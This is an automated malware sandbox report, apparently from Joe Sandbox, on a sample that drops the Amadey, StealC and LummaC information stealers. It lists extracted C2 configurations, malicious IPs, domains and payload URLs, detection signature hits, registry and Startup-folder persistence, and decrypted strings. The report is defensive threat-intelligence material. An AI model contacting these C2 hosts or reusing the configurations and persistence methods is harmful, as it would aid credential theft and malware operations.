Amadey	Amadey is a botnet that appeared around October 2018 and is being sold for about $500 on Russian-speaking hacking forums. It periodically sends information about the system and installed AV software to its C2 server and polls to receive orders from it. Its main functionality is that it can load other payloads (called "tasks") for all or specifically targeted computers compromised by the malware.	No Attribution	https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://asec.ahnlab.com/en/36634/ https://asec.ahnlab.com/en/40483/ https://asec.ahnlab.com/en/41450/ https://asec.ahnlab.com/en/44504/	https://malpedia.caad.fkie.fraunhofer.de/details/win.amadey

Name	Description	Attribution	Blogpost URLs	Link
Stealc	Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.	No Attribution	https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://blog.sekoia.io/stealc-a-copycat-of-vidar-and-raccoon-infostealers-gaining-in-popularity-part-1/ https://blog.sekoia.io/stealc-a-copycat-of-vidar-and-raccoon-infostealers-gaining-in-popularity-part-2/ https://cocomelonc.github.io/book/2023/12/13/malwild-book.html https://g0njxa.medium.com/approaching-stealers-devs-a-brief-interview-with-stealc-cbe5c94b84af	https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

Malware Configuration

Threatname: StealC

{"C2 url": "http://185.215.113.206/6c4adf523b719729.php", "Botnet": "tale"}

Threatname: LummaC

{"C2 url": ["founpiuer.store", "scriptyprefej.store", "navygenerayk.store", "crisiwarny.store", "fadehairucw.store", "thumbystriw.store", "presticitpo.store", "necklacedmny.store"], "Build id": "4SD0y4--legendaryy"}

Threatname: Amadey

{"C2 url": "185.215.113.43/Zu7JuNko/index.php", "Version": "4.42", "Install Folder": "abc3bc1985", "Install File": "skotes.exe"}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
dump.pcap	JoeSecurity_Stealc_1	Yara detected Stealc	Joe Security

Memory Dumps

Source	Rule	Description	Author
0000004B.00000002.2734723718.0000000000C91000.00000040.00000001.01000000.00000011.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
00000001.00000002.1723598147.0000000000401000.00000040.00000001.01000000.00000007.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
0000005F.00000002.3080054102.000000000106A000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000048.00000002.2847739152.0000000002D17000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000038.00000003.2841223672.0000000000F8C000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000007.00000002.2424020147.0000000002E42000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
0000004B.00000002.2733720136.0000000000B32000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
00000006.00000002.2997911476.0000000000401000.00000040.00000001.01000000.00000007.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
00000048.00000002.2847739152.0000000002D32000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000004B.00000003.2641943936.0000000005120000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
00000038.00000002.3043805195.0000000000F8E000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000002.00000002.1725120776.0000000000401000.00000040.00000001.01000000.00000007.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
0000003B.00000002.2616387171.00000000031D1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
00000081.00000003.2843067219.00000000056B0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
00000007.00000002.2799881081.0000000005E40000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
00000000.00000002.1696962631.00000000002D1000.00000040.00000001.01000000.00000003.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
0000000A.00000002.3056952575.00000000031B6000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: pohtent2.exe PID: 8056	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
Process Memory Space: pohtent2.exe PID: 8056	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: InstallUtil.exe PID: 2872	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: InstallUtil.exe PID: 2872	JoeSecurity_MicroClip	Yara detected MicroClip	Joe Security
Process Memory Space: 2090621607.exe PID: 12448	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: TypeId.exe PID: 13156	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
Process Memory Space: TypeId.exe PID: 13156	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: InstallUtil.exe PID: 12568	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: 0717674af5.exe PID: 6972	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
Process Memory Space: 0717674af5.exe PID: 6972	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
Process Memory Space: 2090621607.exe PID: 16232	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: 0717674af5.exe PID: 7408	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
Process Memory Space: 0717674af5.exe PID: 7408	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
decrypted.memstr	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security
decrypted.memstr	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security
decrypted.memstr	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
Click to see the 28 entries

Unpacked PEs

Source	Rule	Description	Author
7.2.pohtent2.exe.5e40000.3.raw.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
75.2.0717674af5.exe.c90000.0.unpack	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
6.2.skotes.exe.400000.0.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
2.2.skotes.exe.400000.0.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
1.2.skotes.exe.400000.0.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
0.2.lIocM276SA.exe.2d0000.0.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
Click to see the 1 entries

Sigma Signatures

System Summary

Sigma detected: New RUN Key Pointing to Suspicious Folder

Source: Registry Key set

Author: Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing: Data: Details: C:\Users\user\AppData\Local\Temp\1004550001\2090621607.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe, ProcessId: 7856, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\2090621607.exe

Sigma detected: WScript or CScript Dropper

Source: Process started

Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TypeId.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TypeId.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TypeId.vbs" , ProcessId: 12008, ProcessName: wscript.exe

Sigma detected: CurrentVersion Autorun Keys Modification

Source: Registry Key set

Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\AppData\Local\Temp\1004550001\2090621607.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe, ProcessId: 7856, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\2090621607.exe

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Source: Process started

Author: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TypeId.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TypeId.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TypeId.vbs" , ProcessId: 12008, ProcessName: wscript.exe

Data Obfuscation

Sigma detected: Drops script at startup location

Source: File created

Author: Joe Security: Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\1004537001\pohtent2.exe, ProcessId: 8056, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TypeId.vbs

Suricata Signatures

ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-07T07:32:15.346386+0100	2022930	1	A Network Trojan was detected	172.202.163.200	443	192.168.2.4	49730	TCP
2024-11-07T07:32:53.496223+0100	2022930	1	A Network Trojan was detected	172.202.163.200	443	192.168.2.4	49736	TCP

ET JA3 Hash - Possible Malware - Fake Firefox Font Update

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-07T07:33:44.981574+0100	2028371	3	Unknown Traffic	192.168.2.4	50024	172.67.133.135	443	TCP
2024-11-07T07:33:49.708480+0100	2028371	3	Unknown Traffic	192.168.2.4	50052	172.67.133.135	443	TCP
2024-11-07T07:34:05.683432+0100	2028371	3	Unknown Traffic	192.168.2.4	50108	172.67.133.135	443	TCP
2024-11-07T07:34:10.035622+0100	2028371	3	Unknown Traffic	192.168.2.4	50111	172.67.133.135	443	TCP
2024-11-07T07:34:18.870462+0100	2028371	3	Unknown Traffic	192.168.2.4	50114	172.67.133.135	443	TCP
2024-11-07T07:34:23.112938+0100	2028371	3	Unknown Traffic	192.168.2.4	50115	172.67.133.135	443	TCP

ET MALWARE Generic AsyncRAT Style SSL Cert

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-07T07:33:22.340591+0100	2035595	1	Domain Observed Used for C2 Detected	162.230.48.189	56001	192.168.2.4	49876	TCP

ET MALWARE Lumma Stealer CnC Host Checkin

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-07T07:33:45.210848+0100	2054653	1	A Network Trojan was detected	192.168.2.4	50024	172.67.133.135	443	TCP
2024-11-07T07:33:50.315164+0100	2054653	1	A Network Trojan was detected	192.168.2.4	50052	172.67.133.135	443	TCP
2024-11-07T07:34:06.182276+0100	2054653	1	A Network Trojan was detected	192.168.2.4	50108	172.67.133.135	443	TCP
2024-11-07T07:34:10.775077+0100	2054653	1	A Network Trojan was detected	192.168.2.4	50111	172.67.133.135	443	TCP
2024-11-07T07:34:19.569740+0100	2054653	1	A Network Trojan was detected	192.168.2.4	50114	172.67.133.135	443	TCP
2024-11-07T07:34:24.022730+0100	2054653	1	A Network Trojan was detected	192.168.2.4	50115	172.67.133.135	443	TCP

ET MALWARE Lumma Stealer Related Activity

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-07T07:33:45.210848+0100	2049836	1	A Network Trojan was detected	192.168.2.4	50024	172.67.133.135	443	TCP
2024-11-07T07:34:06.182276+0100	2049836	1	A Network Trojan was detected	192.168.2.4	50108	172.67.133.135	443	TCP
2024-11-07T07:34:19.569740+0100	2049836	1	A Network Trojan was detected	192.168.2.4	50114	172.67.133.135	443	TCP

ET MALWARE Lumma Stealer Related Activity M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-07T07:33:50.315164+0100	2049812	1	A Network Trojan was detected	192.168.2.4	50052	172.67.133.135	443	TCP
2024-11-07T07:34:10.775077+0100	2049812	1	A Network Trojan was detected	192.168.2.4	50111	172.67.133.135	443	TCP
2024-11-07T07:34:24.022730+0100	2049812	1	A Network Trojan was detected	192.168.2.4	50115	172.67.133.135	443	TCP

ET MALWARE Observed Win32/Lumma Stealer Related Domain (founpiuer .store in TLS SNI)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-07T07:33:44.981574+0100	2057122	1	Domain Observed Used for C2 Detected	192.168.2.4	50024	172.67.133.135	443	TCP
2024-11-07T07:33:49.708480+0100	2057122	1	Domain Observed Used for C2 Detected	192.168.2.4	50052	172.67.133.135	443	TCP
2024-11-07T07:34:05.683432+0100	2057122	1	Domain Observed Used for C2 Detected	192.168.2.4	50108	172.67.133.135	443	TCP
2024-11-07T07:34:10.035622+0100	2057122	1	Domain Observed Used for C2 Detected	192.168.2.4	50111	172.67.133.135	443	TCP
2024-11-07T07:34:18.870462+0100	2057122	1	Domain Observed Used for C2 Detected	192.168.2.4	50114	172.67.133.135	443	TCP
2024-11-07T07:34:23.112938+0100	2057122	1	Domain Observed Used for C2 Detected	192.168.2.4	50115	172.67.133.135	443	TCP

ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-07T07:33:16.483761+0100	2044696	1	A Network Trojan was detected	192.168.2.4	49832	185.215.113.43	80	TCP
2024-11-07T07:33:30.063637+0100	2044696	1	A Network Trojan was detected	192.168.2.4	49926	185.215.113.43	80	TCP
2024-11-07T07:33:37.381365+0100	2044696	1	A Network Trojan was detected	192.168.2.4	49970	185.215.113.43	80	TCP
2024-11-07T07:33:42.346983+0100	2044696	1	A Network Trojan was detected	192.168.2.4	50007	185.215.113.43	80	TCP
2024-11-07T07:33:49.705057+0100	2044696	1	A Network Trojan was detected	192.168.2.4	50048	185.215.113.43	80	TCP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (crisiwarny .store)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-07T07:33:42.785684+0100	2057129	1	Domain Observed Used for C2 Detected	192.168.2.4	57974	1.1.1.1	53	UDP
2024-11-07T07:34:00.224654+0100	2057129	1	Domain Observed Used for C2 Detected	192.168.2.4	55330	1.1.1.1	53	UDP
2024-11-07T07:34:17.298452+0100	2057129	1	Domain Observed Used for C2 Detected	192.168.2.4	63553	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (fadehairucw .store)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-07T07:33:43.358425+0100	2057127	1	Domain Observed Used for C2 Detected	192.168.2.4	63059	1.1.1.1	53	UDP
2024-11-07T07:34:00.601713+0100	2057127	1	Domain Observed Used for C2 Detected	192.168.2.4	65186	1.1.1.1	53	UDP
2024-11-07T07:34:17.326962+0100	2057127	1	Domain Observed Used for C2 Detected	192.168.2.4	64608	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (founpiuer .store)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-07T07:33:44.324094+0100	2057121	1	Domain Observed Used for C2 Detected	192.168.2.4	60453	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (necklacedmny .store)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-07T07:33:44.279481+0100	2057123	1	Domain Observed Used for C2 Detected	192.168.2.4	62195	1.1.1.1	53	UDP
2024-11-07T07:34:03.236490+0100	2057123	1	Domain Observed Used for C2 Detected	192.168.2.4	58539	1.1.1.1	53	UDP
2024-11-07T07:34:17.696946+0100	2057123	1	Domain Observed Used for C2 Detected	192.168.2.4	62114	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (presticitpo .store)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-07T07:33:42.639062+0100	2057131	1	Domain Observed Used for C2 Detected	192.168.2.4	59858	1.1.1.1	53	UDP
2024-11-07T07:33:59.740264+0100	2057131	1	Domain Observed Used for C2 Detected	192.168.2.4	51429	1.1.1.1	53	UDP
2024-11-07T07:34:17.272148+0100	2057131	1	Domain Observed Used for C2 Detected	192.168.2.4	55752	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (thumbystriw .store)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-07T07:33:43.843932+0100	2057125	1	Domain Observed Used for C2 Detected	192.168.2.4	51581	1.1.1.1	53	UDP
2024-11-07T07:34:02.313928+0100	2057125	1	Domain Observed Used for C2 Detected	192.168.2.4	61126	1.1.1.1	53	UDP
2024-11-07T07:34:17.465996+0100	2057125	1	Domain Observed Used for C2 Detected	192.168.2.4	52992	1.1.1.1	53	UDP

ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-07T07:33:42.773013+0100	2044243	1	Malware Command and Control Activity Detected	192.168.2.4	50008	185.215.113.206	80	TCP
2024-11-07T07:34:11.022021+0100	2044243	1	Malware Command and Control Activity Detected	192.168.2.4	50112	185.215.113.206	80	TCP
2024-11-07T07:34:29.633238+0100	2044243	1	Malware Command and Control Activity Detected	192.168.2.4	50116	185.215.113.206	80	TCP

ETPRO MALWARE Amadey CnC Activity M3

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-07T07:33:05.126473+0100	2856147	1	A Network Trojan was detected	192.168.2.4	49773	185.215.113.43	80	TCP

ETPRO MALWARE Amadey CnC Response M1

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-07T07:33:15.582334+0100	2856122	1	A Network Trojan was detected	185.215.113.43	80	192.168.2.4	49787	TCP
2024-11-07T07:33:29.132152+0100	2856122	1	A Network Trojan was detected	185.215.113.43	80	192.168.2.4	49871	TCP

ETPRO MALWARE Common Downloader Header Pattern H

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-07T07:33:09.345116+0100	2803305	3	Unknown Traffic	192.168.2.4	49794	172.67.195.247	80	TCP
2024-11-07T07:33:22.784927+0100	2803305	3	Unknown Traffic	192.168.2.4	49882	185.215.113.16	80	TCP
2024-11-07T07:33:31.025222+0100	2803305	3	Unknown Traffic	192.168.2.4	49934	185.215.113.16	80	TCP
2024-11-07T07:33:43.369256+0100	2803305	3	Unknown Traffic	192.168.2.4	50012	185.215.113.16	80	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: lIocM276SA.exe

Avira: detected

Antivirus detection for URL or domain

Source: https://presticitpo.store:443/api;1	Avira URL Cloud: Label: malware
Source: http://185.215.113.43/es	Avira URL Cloud: Label: malware
Source: http://185.215.113.43/fac00b58987e8e4f4b2846d934f48b15eaa495c49#	Avira URL Cloud: Label: malware
Source: http://185.215.113.206/6c4adf523b719729.php/u	Avira URL Cloud: Label: malware
Source: http://185.215.113.43/ocal	Avira URL Cloud: Label: malware
Source: http://185.215.113.16/luma/random.exeM	Avira URL Cloud: Label: phishing
Source: http://185.215.113.16/off/random.exeb	Avira URL Cloud: Label: phishing
Source: http://185.215.113.16/off/random.exe=	Avira URL Cloud: Label: phishing
Source: https://founpiuer.store/apistr	Avira URL Cloud: Label: malware
Source: http://185.215.113.43/Zu7JuNko/index.phpncodedE	Avira URL Cloud: Label: malware
Source: http://185.215.113.43/Zu7JuNko/index.phpY	Avira URL Cloud: Label: malware
Source: http://185.215.113.43/Zu7JuNko/index.phpM	Avira URL Cloud: Label: malware
Source: http://185.215.113.43/Zu7JuNko/index.php4553001	Avira URL Cloud: Label: malware
Source: http://185.215.113.16/luma/random.exeX	Avira URL Cloud: Label: phishing
Source: https://founpiuer.store/e/n	Avira URL Cloud: Label: malware
Source: http://185.215.113.16/off/random.exec61395d7f	Avira URL Cloud: Label: phishing
Source: https://founpiuer.store/bool	Avira URL Cloud: Label: malware

Antivirus detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Temp\1004550001\2090621607.exe	Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\pohtent2[1].exe	Avira: detection malicious, Label: HEUR/AGEN.1309270
Source: C:\Users\user\AppData\Roaming\TypeId.exe	Avira: detection malicious, Label: HEUR/AGEN.1309270
Source: C:\Users\user\AppData\Local\Temp\1004537001\pohtent2.exe	Avira: detection malicious, Label: HEUR/AGEN.1309270
Source: C:\Users\user\AppData\Local\Temp\1004551001\0717674af5.exe	Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe	Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe	Avira: detection malicious, Label: TR/Crypt.TPM.Gen

Found malware configuration

Source: 00000001.00000002.1723598147.0000000000401000.00000040.00000001.01000000.00000007.sdmp	Malware Configuration Extractor: Amadey {"C2 url": "185.215.113.43/Zu7JuNko/index.php", "Version": "4.42", "Install Folder": "abc3bc1985", "Install File": "skotes.exe"}
Source: 75.2.0717674af5.exe.c90000.0.unpack	Malware Configuration Extractor: StealC {"C2 url": "http://185.215.113.206/6c4adf523b719729.php", "Botnet": "tale"}
Source: 95.2.2090621607.exe.aa0000.0.unpack	Malware Configuration Extractor: LummaC {"C2 url": ["founpiuer.store", "scriptyprefej.store", "navygenerayk.store", "crisiwarny.store", "fadehairucw.store", "thumbystriw.store", "presticitpo.store", "necklacedmny.store"], "Build id": "4SD0y4--legendaryy"}

Multi AV Scanner detection for domain / URL

Source: trashycontinuousbubbly.com	Virustotal: Detection: 11%			Perma Link
Source: http://185.215.113.43/fac00b58987e8e4f4b2846d934f48b15eaa495c49#	Virustotal: Detection: 17%			Perma Link

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe	ReversingLabs: Detection: 39%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\random[1].exe	ReversingLabs: Detection: 44%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\random[1].exe	ReversingLabs: Detection: 39%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\pohtent2[1].exe	ReversingLabs: Detection: 26%
Source: C:\Users\user\AppData\Local\Temp\1004537001\pohtent2.exe	ReversingLabs: Detection: 26%
Source: C:\Users\user\AppData\Local\Temp\1004550001\2090621607.exe	ReversingLabs: Detection: 44%
Source: C:\Users\user\AppData\Local\Temp\1004551001\0717674af5.exe	ReversingLabs: Detection: 39%
Source: C:\Users\user\AppData\Local\Temp\1004553001\4477947f1f.exe	ReversingLabs: Detection: 39%
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	ReversingLabs: Detection: 52%
Source: C:\Users\user\AppData\Roaming\TypeId.exe	ReversingLabs: Detection: 26%

Multi AV Scanner detection for submitted file

Source: lIocM276SA.exe	ReversingLabs: Detection: 52%
Source: lIocM276SA.exe	Virustotal: Detection: 57%			Perma Link

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1004550001\2090621607.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1004553001\4477947f1f.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\pohtent2[1].exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\TypeId.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1004537001\pohtent2.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1004551001\0717674af5.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe	Joe Sandbox ML: detected

Machine Learning detection for sample

Source: lIocM276SA.exe

Joe Sandbox ML: detected

Sample uses string decryption to hide its real strings

Source: 00000038.00000002.3008510644.0000000000AA1000.00000040.00000001.01000000.0000000E.sdmp	String decryptor: scriptyprefej.store
Source: 00000038.00000002.3008510644.0000000000AA1000.00000040.00000001.01000000.0000000E.sdmp	String decryptor: navygenerayk.store
Source: 00000038.00000002.3008510644.0000000000AA1000.00000040.00000001.01000000.0000000E.sdmp	String decryptor: founpiuer.store
Source: 00000038.00000002.3008510644.0000000000AA1000.00000040.00000001.01000000.0000000E.sdmp	String decryptor: necklacedmny.store
Source: 00000038.00000002.3008510644.0000000000AA1000.00000040.00000001.01000000.0000000E.sdmp	String decryptor: thumbystriw.store
Source: 00000038.00000002.3008510644.0000000000AA1000.00000040.00000001.01000000.0000000E.sdmp	String decryptor: fadehairucw.store
Source: 00000038.00000002.3008510644.0000000000AA1000.00000040.00000001.01000000.0000000E.sdmp	String decryptor: crisiwarny.store
Source: 00000038.00000002.3008510644.0000000000AA1000.00000040.00000001.01000000.0000000E.sdmp	String decryptor: presticitpo.store
Source: 00000038.00000002.3008510644.0000000000AA1000.00000040.00000001.01000000.0000000E.sdmp	String decryptor: presticitpo.store
Source: 00000038.00000002.3008510644.0000000000AA1000.00000040.00000001.01000000.0000000E.sdmp	String decryptor: lid=%s&j=%s&ver=4.0
Source: 00000038.00000002.3008510644.0000000000AA1000.00000040.00000001.01000000.0000000E.sdmp	String decryptor: TeslaBrowser/5.5
Source: 00000038.00000002.3008510644.0000000000AA1000.00000040.00000001.01000000.0000000E.sdmp	String decryptor: - Screen Resoluton:
Source: 00000038.00000002.3008510644.0000000000AA1000.00000040.00000001.01000000.0000000E.sdmp	String decryptor: - Physical Installed Memory:
Source: 00000038.00000002.3008510644.0000000000AA1000.00000040.00000001.01000000.0000000E.sdmp	String decryptor: Workgroup: -
Source: 00000038.00000002.3008510644.0000000000AA1000.00000040.00000001.01000000.0000000E.sdmp	String decryptor: 4SD0y4--legendaryy
Source: 75.2.0717674af5.exe.c90000.0.unpack	String decryptor: INSERT_KEY_HERE
Source: 75.2.0717674af5.exe.c90000.0.unpack	String decryptor: 30
Source: 75.2.0717674af5.exe.c90000.0.unpack	String decryptor: 11
Source: 75.2.0717674af5.exe.c90000.0.unpack	String decryptor: 20
Source: 75.2.0717674af5.exe.c90000.0.unpack	String decryptor: 24
Source: 75.2.0717674af5.exe.c90000.0.unpack	String decryptor: GetProcAddress
Source: 75.2.0717674af5.exe.c90000.0.unpack	String decryptor: LoadLibraryA
Source: 75.2.0717674af5.exe.c90000.0.unpack	String decryptor: lstrcatA
Source: 75.2.0717674af5.exe.c90000.0.unpack	String decryptor: OpenEventA
